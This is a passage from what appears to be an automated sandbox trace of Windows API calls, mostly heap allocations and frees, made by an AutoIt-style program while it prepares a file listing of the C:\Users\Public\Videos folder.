lpMsg=0x8cf968) returned 0 [0269.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0269.269] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0269.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0269.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9b8 [0269.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0269.269] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0269.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9b8 | out: hHeap=0x970000) returned 1 [0269.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0269.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0269.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c48 [0269.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0269.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0269.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0269.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0269.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0269.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c68 [0269.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0269.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0269.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0269.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0269.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c38 [0269.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0269.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0269.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0269.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51628 [0269.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0269.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0269.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0269.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0269.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0269.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0269.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0269.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0269.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0269.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0269.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0269.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0269.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0269.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0269.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0269.271] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0269.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0269.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0269.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0269.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0269.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0269.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0269.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0269.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0269.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0269.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0269.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0269.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0269.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0269.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0269.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0269.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0269.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0269.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0269.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0269.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0269.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0269.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0269.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0269.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0269.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0269.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0269.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0269.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0269.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0269.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0269.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0269.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0269.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0269.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0269.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0269.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0269.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0269.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0269.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0269.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0269.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0269.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0269.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0269.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0269.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0269.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0269.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0269.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0269.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0269.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0269.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0269.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0269.273] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0269.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0269.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0269.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0269.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0269.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0269.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0269.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0269.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0269.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0269.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0269.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0269.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0269.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0269.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0269.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0269.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0269.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0269.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0269.273] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/]+\\z", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0269.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x9) returned 0x2e51b38 [0269.273] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/]+\\z", cchWideChar=9, lpMultiByteStr=0x2e51b38, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\\\\/]+\\z", lpUsedDefaultChar=0x0) returned 9 [0269.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0269.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x52) returned 0x2e54858 [0269.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a00 [0269.273] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\Public\\Videos", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0269.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x17) returned 0x2e69a28 [0269.273] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\Public\\Videos", cchWideChar=23, lpMultiByteStr=0x2e69a28, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\Public\\Videos", lpUsedDefaultChar=0x0) returned 23 [0269.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0269.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0269.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0269.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2e) returned 0x2e7e9b8 [0269.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0269.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0269.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0269.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0269.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0269.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0269.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0269.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0269.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0269.274] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2e54328, cbMultiByte=23, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 23 [0269.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2e) returned 0x2e7e9f0 [0269.274] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2e54328, cbMultiByte=23, lpWideCharStr=0x2e7e9f0, cchWideChar=23 | out: lpWideCharStr="C:\\Users\\Public\\Videos") returned 23 [0269.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0269.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e980 [0269.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9f0 | out: hHeap=0x970000) returned 1 [0269.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0269.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0269.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e980 | out: hHeap=0x970000) returned 1 [0269.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0269.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0269.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0269.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0269.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0269.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0269.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0269.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0269.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0269.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0269.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0269.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0269.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0269.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0269.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0269.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0269.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0269.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0269.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0269.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0269.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x60) returned 0x2e54858 [0269.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9b8 | out: hHeap=0x970000) returned 1 [0269.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0269.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0269.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0269.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0269.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0269.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0269.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0269.275] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0269.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0269.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0269.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0269.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0269.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0269.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0269.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0269.276] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Videos\\" (normalized: "c:\\users\\public\\videos")) returned 0x11 [0269.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0269.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0269.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0269.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0269.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0269.276] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0269.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0269.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0269.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0269.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0269.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0269.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0269.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0269.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0269.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0269.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0269.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0269.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0269.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0269.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0269.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0269.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0269.277] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0269.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x17) returned 0x2e69888 [0269.277] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", cchWideChar=23, lpMultiByteStr=0x2e69888, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", lpUsedDefaultChar=0x0) returned 23 [0269.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0269.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0269.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0269.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x59) returned 0x2e58910 [0269.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51988 [0269.277] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="*.*", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0269.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0269.277] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="*.*", cchWideChar=4, lpMultiByteStr=0x2e54bf8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*.*", lpUsedDefaultChar=0x0) returned 4 [0269.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0269.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0269.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0269.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0269.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0269.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0269.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0269.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0269.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0269.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0269.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0269.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0269.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0269.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0269.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0269.277] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0269.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0269.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0269.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0269.278] 